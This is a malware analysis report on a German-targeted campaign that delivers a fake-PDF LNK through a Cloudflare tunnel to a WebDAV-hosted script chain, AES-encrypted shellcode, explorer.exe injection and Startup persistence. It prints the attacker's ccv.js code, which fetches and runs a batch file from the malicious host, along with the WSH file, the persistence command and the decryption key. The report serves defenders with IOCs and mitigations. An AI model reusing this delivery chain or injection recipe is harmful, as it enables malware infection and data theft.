Operation WsgiDev Tunnel — Cloudflare Tunnel Hosting WsgiDAV Multi-Stage Malware Delivery

TLP: WHITE Date: 2026-04-03 Analyst: GHOST (Breakglass Intelligence) Classification: Cybercrime — Malware Staging via Cloudflare Tunnel Status: LIVE (as of 2026-04-03T03:09Z)

---

Executive Summary

A live Cloudflare Tunnel (trycloudflare.com) was discovered hosting a WsgiDAV 4.3.3 open directory server serving a multi-stage malware infection chain. The attack chain uses a German-language social engineering lure (fake PDF document) delivered via a Windows Shortcut (.LNK) file that chains through WebDAV to execute an encrypted shellcode loader. The shellcode is AES-256-CBC encrypted and injected into explorer.exe via classic process injection (VirtualAllocEx + WriteProcessMemory + CreateRemoteThread). None of the indicators have been previously reported to VirusTotal, MalwareBazaar, ThreatFox, or URLhaus — this is a novel, unreported campaign.

The operator built the LNK on a VPS named vps-756346 using an Administrator account. The CF-Ray header routes through Amsterdam, and the "dokumente" directory name is German — strongly suggesting a German-speaking target audience and potentially a European-based operator.

Key Findings

• NOVEL CAMPAIGN: Zero detections across all major threat intelligence platforms (VT, MalwareBazaar, ThreatFox, URLhaus, URLScan)
• Full infection chain recovered: LNK -> WSH -> JS (WebDAV) -> BAT (PowerShell) -> Python embedded runtime -> AES-256-CBC shellcode decryption -> Process injection into explorer.exe
• German-targeting: Directory named "dokumente" (German for "documents"), LNK disguised as DKM_00KS0095283.PDF (DKM = Deutsche Kreditbank Mecklenburg or similar German financial institution reference)
• AES-256-CBC shellcode: 101,634 bytes of decrypted position-independent shellcode with PEB-walking API resolver — no readable strings, heavily obfuscated
• Persistence: Creates CryptoLoader.lnk in Windows Startup folder
• OPSEC failure: Machine name vps-756346 and user Administrator embedded in LNK metadata — the actor built the payload on a numbered VPS, likely a cloud instance
• Anonymous read-write WebDAV access: Server allows unauthenticated writes, meaning the operator (or anyone) can update payloads in real-time

Attack Chain

[1] Victim receives/downloads: dokumente/DKM_00KS0095283.PDF.lnk
    (Disguised as PDF with Edge browser icon, actually Windows Shortcut)
         |
         v
[2] LNK executes: wscript.exe \\trycloudflare...@SSL\DavWWWRoot\oa.wsh
    (Windows Script Host opens .wsh file via WebDAV over HTTPS)
         |
         v
[3] oa.wsh loads: \\trycloudflare...@SSL\DavWWWRoot\ccv.js
    (WSH settings file points to JavaScript payload on same WebDAV)
         |
         v
[4] ccv.js copies final.bat to %TEMP%\r.bat and executes it hidden
    (ActiveXObject WScript.Shell + FileSystemObject via WebDAV)
         |
         v
[5] final.bat (hidden window):
    a. Downloads Python 3.11.8 embedded from python.org
    b. Installs pip, psutil, cryptography, pyaes
    c. Downloads files.zip from trycloudflare tunnel
    d. Extracts: encrypted_loader.py + as_encrypted.bin + as_key.bin
    e. Downloads add_to_startup.bat for persistence
         |
         v
[6] encrypted_loader.py:
    a. Reads as_key.bin (48 bytes: 32-byte AES key + 16-byte IV)
    b. Decrypts as_encrypted.bin with AES-256-CBC
    c. Strips PKCS7 padding -> 101,634 bytes of raw shellcode
    d. Finds explorer.exe PID via CreateToolhelp32Snapshot
    e. OpenProcess -> VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread
         |
         v
[7] Shellcode executes inside explorer.exe:
    - Position-independent code with PEB-walking API resolution
    - 77 KB encrypted data blob + 23 KB loader code
    - Likely staged C2 beacon (Cobalt Strike / Sliver / custom)
         |
         v
[8] Persistence: add_to_startup.bat creates CryptoLoader.lnk
    in %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup
    -> Re-runs encrypted_loader.py on every login

Infrastructure Analysis

Cloudflare Tunnel

Property	Value
Full URL	hxxps://requires-fortune-nutten-eligible[.]trycloudflare[.]com/
Tunnel Type	Cloudflare Quick Tunnel (trycloudflare.com)
WebDAV Server	WsgiDAV/4.3.3
Authentication	Anonymous (read-write)
CF-Ray	AMS (Amsterdam PoP)
Status	LIVE (2026-04-03T03:09Z)
First Activity	2026-03-23 (earliest file timestamp: add_to_startup.bat)
Last Activity	2026-03-31 (final.bat, ccv.js, oa.wsh, LNK updated)

Tunnel Characteristics

Cloudflare Quick Tunnels (trycloudflare.com) are ephemeral, free, anonymous tunnels that require no Cloudflare account. They:

• Generate random 4-word subdomains ("requires-fortune-nutten-eligible")
• Proxy traffic through Cloudflare CDN, hiding the true origin IP
• Can be created and destroyed in seconds
• Are increasingly abused for malware staging (no attribution, no billing, no logs accessible to investigators)

The word "nutten" in the subdomain is notable — it is German slang (vulgar), which may or may not be coincidental given the German-language targeting.

File Inventory

File	Type	Size	SHA256	Modified
dokumente/DKM_00KS0095283.PDF.lnk	Windows Shortcut	1,904 B	7082ed18f1eaaccfdea66bfa51aa6d00113dadf35b9d60d5688604b9744c1c01	2026-03-31
oa.wsh	Windows Script Host Settings	117 B	a6a2de606b094f7c4d35cd7cb02f5a512f72981110981fab2bf737ad52bc4506	2026-03-31
ccv.js	JScript (ActiveXObject)	296 B	354e069edf6d52b43326a8f6408e95c0bd4c5cb6da3a81971036e18f8b2ca8c6	2026-03-31
final.bat	Batch Installer Script	7,512 B	ea4043b07992e4aefb3e15b2ef3ddd71de315109c01b4230585cc213ab6ec3dd	2026-03-31
files.zip	Payload Archive	104,873 B	a9ebfd647cb5930c3a19c3fd66f103c06019f43aa53b8d309d31682514a9cd60	2026-03-23
add_to_startup.bat	Persistence Script	495 B	717bb7be812fe4f57d4b7f1add1654b8a2dfb6063bd616cc26748039f247c43f	2026-03-23
desktop.ini	Folder Customization	504 B	8301e344371b0753d547b429c5fe513908b1c9813144f08549563ac7f4d7da68	2021-08-20

Extracted from files.zip

File	Size	SHA256
encrypted_loader.py	8,923 B	4a510219ffc0f5bc4acdf6e33d80d85d88155d88049cedaa00aaa9eed8051a3f
as_encrypted.bin	101,648 B	869b721401fd595867ea3320a2709d100751f8f9d25f8a59cc28af7169325131
as_key.bin	48 B	0c775d9263fff22c04d75d12b0a5d1a5b73c5a787a7dcdd34fabccdf9e0a0fe5

Decrypted Shellcode

Property	Value
SHA256	fb7ee12fb8d66e18ca1e629342c4c2fd5874ec11abcf338e17de69c499afb5cf
Size	101,634 bytes
Encryption	AES-256-CBC, PKCS7 padding
AES Key	98e00a19c5940403589a54508be5d2de3c3a633bc578aa4ef4e6bc3a649a24b1
AES IV	87c2065f49f439294373e10c569d35bb
Architecture	x86-64
Loader Type	Position-independent shellcode with PEB-walking API resolver
Structure	77 KB encrypted data blob (offset 5-0x12f8d) + 23 KB loader code (0x12f8d+)
API Resolution	PEB walk via gs:[0x60] -> PEB_LDR_DATA -> InLoadOrderModuleList

Malware Analysis

Stage 1: LNK File (DKM_00KS0095283.PDF.lnk)

Social Engineering: The file is named to appear as a German financial document (DKM_00KS0095283.PDF) but is actually a Windows Shortcut. It uses the Microsoft Edge icon (msedge.exe) to further disguise itself.

LNK Metadata:

• Target: C:\Windows\System32\wscript.exe
• Arguments: \\requires-fortune-nutten-eligible.trycloudflare.com@SSL\DavWWWRoot\oa.wsh
• Working Dir: C:\Users\Administrator\Music (with path traversal)
• Icon: %ProgramFiles(x86)%\Microsoft\Edge\Application\msedge.exe
• Machine Name: vps-756346 (OPSEC failure)
• User: Administrator
• Timestamps: 2021-05-08T08:14:38 (likely copied from a template or time-stomped)

Stage 2: WSH Chain (oa.wsh -> ccv.js)

oa.wsh is a Windows Script Host settings file that simply references ccv.js on the same WebDAV share:

[ScriptFile]
Path=\\requires-fortune-nutten-eligible.trycloudflare.com@SSL\DavWWWRoot\ccv.js
[Options]
Timeout=0

ccv.js uses ActiveXObject to copy and execute the next stage:

with(new ActiveXObject(WScript.Shell)){
    var target = ExpandEnvironmentStrings(%TEMP%\r.bat);
    new ActiveXObject(Scripting.FileSystemObject).CopyFile(
        \\requires-fortune-nutten-eligible.trycloudflare.com@SSL\DavWWWRoot\final.bat,
        target
    );
    Run(" + target + ", 0);
}

Stage 3: Installer (final.bat)

The batch script performs the following in a hidden PowerShell window:

1. Creates working directory: %APPDATA%\Microsoft\Windows\Crypto\RSA\Cache (blends with legitimate Windows crypto cache)
2. Downloads Python 3.11.8 embedded (amd64) from python.org
3. Modifies the ._pth file to enable site-packages and pip
4. Installs pip, then: psutil, cryptography, pyaes
5. Downloads files.zip from the trycloudflare tunnel and extracts it
6. Downloads add_to_startup.bat for persistence
7. Validates presence of: encrypted_loader.py, as_encrypted.bin, as_key.bin
8. Validates key file is exactly 48 bytes
9. Executes: python encrypted_loader.py -f as_encrypted.bin explorer.exe
10. Sets persistence via add_to_startup.bat

Stage 4: Shellcode Loader (encrypted_loader.py)

A Python-based AES-256-CBC decryptor and process injector:

1. Reads as_key.bin (32-byte key + 16-byte IV = 48 bytes)
2. Decrypts as_encrypted.bin using AES-256-CBC with cryptography library
3. Strips PKCS7 padding
4. Enumerates processes via CreateToolhelp32Snapshot to find explorer.exe
5. Opens explorer.exe with PROCESS_ALL_ACCESS (0x001F0FFF)
6. Allocates RWX memory via VirtualAllocEx
7. Writes decrypted shellcode via WriteProcessMemory
8. Creates remote thread via CreateRemoteThread
9. Waits 5 seconds for execution

Stage 5: Shellcode

The decrypted shellcode (101,634 bytes) is position-independent x64 code:

• Entry: CALL +0x12f8d (pushes data blob address onto stack)
• Data blob: 77,704 bytes at offset 5 (length field at offset 5 = 0x12f88)
• Loader code: Starts at offset 0x12f8d with POP RCX (retrieves data address)
• PEB walk: Located at offset 0x1647a, accesses gs:[0x60] for module enumeration
• No readable strings: The shellcode is fully obfuscated — no API names, URLs, or configuration strings visible in plaintext
• Likely framework: Custom or Donut-style shellcode with encrypted inner payload. The data blob likely contains a second encryption layer protecting the final implant (RAT, stealer, or C2 beacon)

Stage 6: Persistence

add_to_startup.bat creates a shortcut in the Windows Startup folder:

%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\CryptoLoader.lnk
  -> cmd.exe /c cd /d %BASEDIR% && start /b python.exe encrypted_loader.py -f as_encrypted.bin explorer.exe

This ensures the shellcode is re-injected into explorer.exe on every user login.

Threat Actor Profile

Attribution Assessment

• Confidence: LOW-MEDIUM
• Region: Likely Central/Western Europe (German-language targeting, Amsterdam CF-PoP routing)
• Motivation: Financial crime (credential theft or banking trojan targeting German speakers)
• Sophistication: MODERATE — custom shellcode with AES encryption and process injection, but significant OPSEC failures

OPSEC Failures

1. Machine name vps-756346 embedded in LNK metadata — this is a cloud VPS hostname (likely Hetzner, DigitalOcean, or Vultr naming convention)
2. Administrator account used to build the LNK — no attempt to use a non-default username
3. Anonymous read-write WebDAV — anyone can modify the payloads, and the open directory was trivially discoverable
4. Python dependency chain — downloading Python, pip, and 3 packages from public sources creates a large network footprint and multiple detection opportunities
5. Verbose logging — final.bat writes detailed logs to setup.log including error messages and timestamps
6. Reuse of trycloudflare — while anonymous, the tunnel subdomain is static and easily blocked

Targeting Analysis

• Language: German (dokumente = documents)
• Lure: Financial document — DKM_00KS0095283.PDF (DKM likely references Deutsche Kreditbank or similar German institution; the format resembles a German bank reference number)
• Likely delivery: Email attachment or download link, possibly phishing German banking/financial sector victims
• desktop.ini timestamp: 2021-08-20 — this file may have been reused from an older campaign or toolkit

MITRE ATT&CK Mapping

Tactic	Technique	ID	Application
Initial Access	Phishing: Spearphishing Attachment	T1566.001	LNK file disguised as PDF
Execution	User Execution: Malicious File	T1204.002	Victim opens DKM_00KS0095283.PDF.lnk
Execution	Windows Management Instrumentation	T1047	WScript.Shell ActiveXObject
Execution	Command and Scripting: JavaScript	T1059.007	ccv.js via WScript
Execution	Command and Scripting: Windows Cmd	T1059.003	final.bat batch script
Execution	Command and Scripting: Python	T1059.006	encrypted_loader.py
Defense Evasion	Obfuscated Files: Encrypted	T1027.013	AES-256-CBC shellcode encryption
Defense Evasion	Masquerading: Double Extension	T1036.007	.PDF.lnk double extension
Defense Evasion	Process Injection	T1055.003	Thread execution hijacking in explorer.exe
Defense Evasion	Hidden Window	T1564.003	PowerShell -WindowStyle Hidden
Defense Evasion	Masquerading: Match Legitimate Name	T1036.005	CryptoLoader in Windows\Crypto\RSA\Cache
Persistence	Boot/Logon Autostart: Startup Folder	T1547.001	CryptoLoader.lnk in Startup
Command and Control	Application Layer: Web Protocols	T1071.001	WebDAV over HTTPS via Cloudflare
Command and Control	Proxy: External Proxy	T1090.002	Cloudflare Tunnel as C2 proxy
Resource Development	Acquire Infrastructure: Web Service	T1583.006	trycloudflare.com tunnel

IOC Summary

Network Indicators

• requires-fortune-nutten-eligible[.]trycloudflare[.]com (Cloudflare Quick Tunnel — malware staging)
• hxxps://requires-fortune-nutten-eligible[.]trycloudflare[.]com/ (WsgiDAV open directory)
• hxxps://requires-fortune-nutten-eligible[.]trycloudflare[.]com/dokumente/DKM_00KS0095283.PDF.lnk
• hxxps://requires-fortune-nutten-eligible[.]trycloudflare[.]com/final.bat
• hxxps://requires-fortune-nutten-eligible[.]trycloudflare[.]com/files.zip
• hxxps://requires-fortune-nutten-eligible[.]trycloudflare[.]com/ccv.js
• hxxps://requires-fortune-nutten-eligible[.]trycloudflare[.]com/oa.wsh
• hxxps://requires-fortune-nutten-eligible[.]trycloudflare[.]com/add_to_startup.bat

WebDAV Paths

• \\requires-fortune-nutten-eligible[.]trycloudflare[.]com@SSL\DavWWWRoot\oa.wsh
• \\requires-fortune-nutten-eligible[.]trycloudflare[.]com@SSL\DavWWWRoot\ccv.js
• \\requires-fortune-nutten-eligible[.]trycloudflare[.]com@SSL\DavWWWRoot\final.bat

File Indicators

IOC Type	Value
SHA256 (LNK)	7082ed18f1eaaccfdea66bfa51aa6d00113dadf35b9d60d5688604b9744c1c01
SHA256 (oa.wsh)	a6a2de606b094f7c4d35cd7cb02f5a512f72981110981fab2bf737ad52bc4506
SHA256 (ccv.js)	354e069edf6d52b43326a8f6408e95c0bd4c5cb6da3a81971036e18f8b2ca8c6
SHA256 (final.bat)	ea4043b07992e4aefb3e15b2ef3ddd71de315109c01b4230585cc213ab6ec3dd
SHA256 (files.zip)	a9ebfd647cb5930c3a19c3fd66f103c06019f43aa53b8d309d31682514a9cd60
SHA256 (add_to_startup.bat)	717bb7be812fe4f57d4b7f1add1654b8a2dfb6063bd616cc26748039f247c43f
SHA256 (encrypted_loader.py)	4a510219ffc0f5bc4acdf6e33d80d85d88155d88049cedaa00aaa9eed8051a3f
SHA256 (as_encrypted.bin)	869b721401fd595867ea3320a2709d100751f8f9d25f8a59cc28af7169325131
SHA256 (as_key.bin)	0c775d9263fff22c04d75d12b0a5d1a5b73c5a787a7dcdd34fabccdf9e0a0fe5
SHA256 (decrypted shellcode)	fb7ee12fb8d66e18ca1e629342c4c2fd5874ec11abcf338e17de69c499afb5cf
MD5 (LNK)	aa54af43fdfeade0926758867e3cd486
MD5 (final.bat)	8f3a7333507cdb65756661088a50cae0
MD5 (files.zip)	7872fc0a3bedca13123cd072f2119b52

Behavioral Indicators

• Install path: %APPDATA%\Microsoft\Windows\Crypto\RSA\Cache\
• Persistence: %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\CryptoLoader.lnk
• Log file: %APPDATA%\Microsoft\Windows\Crypto\RSA\Cache\setup.log
• Temp file: %TEMP%\r.bat
• Process injection target: explorer.exe via CreateRemoteThread
• Python packages installed: psutil, cryptography, pyaes
• User-Agent pattern: PowerShell Invoke-WebRequest (default UA)

Host Forensic Indicators

• Machine name in LNK: vps-756346
• LNK builder user: Administrator
• Desktop.ini timestamp: 2021-08-20T23:40:25Z (potential toolkit reuse date)

Recommended Actions

Immediate (24-48 hours)

1. Block the tunnel domain: requires-fortune-nutten-eligible.trycloudflare.com at DNS and proxy level
2. Hunt for WebDAV connections: Search for trycloudflare.com@SSL\DavWWWRoot in EDR/proxy logs
3. Search for persistence artifact: CryptoLoader.lnk in user Startup folders
4. Check for install path: %APPDATA%\Microsoft\Windows\Crypto\RSA\Cache\encrypted_loader.py
5. Search for r.bat: In %TEMP% directories on endpoints

Short-term (1-2 weeks)

1. Deploy YARA rules (see below) to scan endpoints and email gateways
2. Deploy Suricata rules (see below) for network monitoring
3. Block trycloudflare.com WebDAV: Consider blocking all WebDAV access to *.trycloudflare.com domains — legitimate use is rare
4. Submit IOCs to VirusTotal, MalwareBazaar, ThreatFox, URLhaus

Medium-term (1-3 months)

1. Monitor for tunnel rotation: The actor may create new trycloudflare tunnels with different subdomains but identical payloads
2. Monitor for payload updates: The WebDAV server allows writes — the actor may update the shellcode
3. Develop behavioral detection: Python embedded runtime + process injection from AppData is highly anomalous

References

• Twitter/X: @smica83 original discovery
• WsgiDAV: https://github.com/mar10/wsgidav/
• Cloudflare Quick Tunnels: https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/do-more-with-tunnels/trycloudflare/
• MITRE ATT&CK: https://attack.mitre.org/